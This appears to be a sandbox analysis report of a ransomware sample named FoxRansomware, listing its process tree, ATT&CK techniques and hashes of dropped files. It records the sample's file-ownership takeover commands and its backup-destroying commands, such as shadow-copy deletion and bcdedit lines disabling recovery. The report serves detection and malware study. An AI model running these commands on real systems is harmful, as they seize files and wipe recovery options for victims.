C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:7432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:7908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "settings.dat" -nobanner3⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "settings.dat" -nobanner4⤵PID:7148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:7496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:7640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:7948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "superbar.png" -nobanner3⤵PID:3456
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "superbar.png" -nobanner4⤵PID:5480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:6708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:7352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:6960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:4828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:6352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵PID:6640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵PID:6824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:6664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:7040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵PID:8156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵PID:7612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:5896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:7008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵PID:6112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵PID:7056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:6616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:6812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵PID:6636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:4568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:4952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl""2⤵PID:6884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" /E /G Admin:F /C3⤵PID:7464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl"3⤵PID:6696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner3⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner4⤵PID:6160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""2⤵PID:5032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C3⤵PID:5516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"3⤵PID:5376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000008.bin" -nobanner3⤵PID:7128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000008.bin" -nobanner4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""2⤵PID:5872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C3⤵PID:5080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"3⤵PID:5228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000M.bin" -nobanner3⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000M.bin" -nobanner4⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"3⤵PID:5168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000010.bin" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000010.bin" -nobanner4⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""2⤵PID:7412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C3⤵PID:3596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"3⤵PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000054.bin" -nobanner3⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000054.bin" -nobanner4⤵PID:6304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""2⤵PID:3640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C3⤵PID:4500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000070.bin" -nobanner3⤵PID:7220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000070.bin" -nobanner4⤵PID:2432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""2⤵PID:5772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C3⤵PID:5696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"3⤵PID:6592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007A.bin" -nobanner3⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000007A.bin" -nobanner4⤵PID:4576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""2⤵PID:1124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C3⤵PID:4948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"3⤵
- Modifies file permissions
PID:5844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007K.bin" -nobanner3⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000007K.bin" -nobanner4⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C3⤵PID:3192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"3⤵
- Modifies file permissions
PID:6900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008J.bin" -nobanner3⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000008J.bin" -nobanner4⤵PID:6976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""2⤵PID:5832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C3⤵PID:3908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"3⤵PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008V.bin" -nobanner3⤵PID:2184
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000008V.bin" -nobanner4⤵PID:7692
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wiCcwVPm.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:6084 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:7456
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:7732
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:7892
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:7908
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:7924
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7504
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#FOX_README#.rtf
Filesize8KB
MD5916fdcec4c71390dd522013c011b1f6c
SHA12c6203664322516061f32d5c0886579b7864f837
SHA2566b0d0c27b914d2f5716f7ebd331f0cd7baacb365f8378f184307cc4c617c0337
SHA512fec2f685b7867e8132875c0ddb5089cedb892882a4358a4b9c72d75d71dc0a6eb66089eb4fb39bac26911218b6a3ca85a099d69b492171438dba2331be3bef11
-
Filesize
3KB
MD5815980bad8bb4bf259f913e4f6645642
SHA11e7f5f6ad4bfe60461e04ec7f4e573b9d9632836
SHA256a0e92f0ce6a8fe5d5e276a1837886cd09ea5404e6f3ff2e806285cad3c036007
SHA512cd7644beb8d59288f5d7ad9df087514967ef1cb00c071eb1a30ffdd9c1c94e6962aec9154046838846f8ce86e8ab3ddef11e8010145abc246a806b5cfa29342b
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
1.2MB
MD5268360527625d09e747d9f7ab1f84da5
SHA109772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA25642f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA51207fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
Filesize
226B
MD509786a5a2b21a7db3412141ed0db2250
SHA170326e9600a6c412318c16282fc553a6c3c5a647
SHA256d621d883e6b7d146f2d9769369d5306082c52310c09f2419247bc3bc0c8accd8
SHA5120014f7d63a4e7707f10b1b0c39835a73346a61f125179f1b0fd092479b43f816233ea021b4a3fff85e9ab46db402a498a54ea09b37fcca2bc203240c685c26da
-
Filesize
6KB
MD52b4dfcd62458a294e53a6f02be70cdd8
SHA15cbfb42e2c6d751da9c9ed15714151206aae7028
SHA256f3ea2995461533b0d5e8a2b7c5fc775e95f7009179d87a05efc2313583966ef2
SHA512c2293414f7ed763e79fbcdeba08ca02c0cf339e5f1088c68e05ca98fb254b2113344a8053256f4bbe82a8352aee90f9009733940068cac057c834e83e5660100
-
Filesize
44KB
MD545587dc4d55d5365acecbc10c89da5e0
SHA1fd13cb145ad00cdf46b2ba9a4deeda260e624cb6
SHA2560c2cb064b285a143814716de753465766ae66bb6885dc89bb8530a08323d77a3
SHA512d21f9f7c03216d264b81abae20ef249ddfa25f42eaa1059b19e94068e06ba725becaad04eb5aac63ae6f84c0dc3d87e5c8c852b800706befd3a1e5cc9b1c589b
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
265B
MD5cc7349ff4465d43c7205550d843c364c
SHA1d1b4a68fde1fac380e7740b7395aa6eebf888c2d
SHA25630d2b070121e9c75067980260c1167e0e867506b0c190db878f9749cb4cead0b
SHA5127208fc39828026e7029cb3ab52e21591ac3a08bf4bded4934831c043c44cdc18c505f25b07ade79418b33362b6e9810e628d1ae5bb5be482ca9747648b860467
-
Filesize
260B
MD50c5c42dfb09581b13b27e13bf4f15fde
SHA1893d27c11734b0fcdb38cdf6f03c5a5ae5a4edca
SHA256948b417b8e0b7babad1db629cd3ee81a2f6eab52e774f47abeca56b37cdda688
SHA5126bd6c1f9cde152fe45dbd31c1e67df488b833fe61482247fb66b2e7968cbae63c3df1147d3af0419be5463b6238ab83b01f01aab7f22607be5f94966a64efe70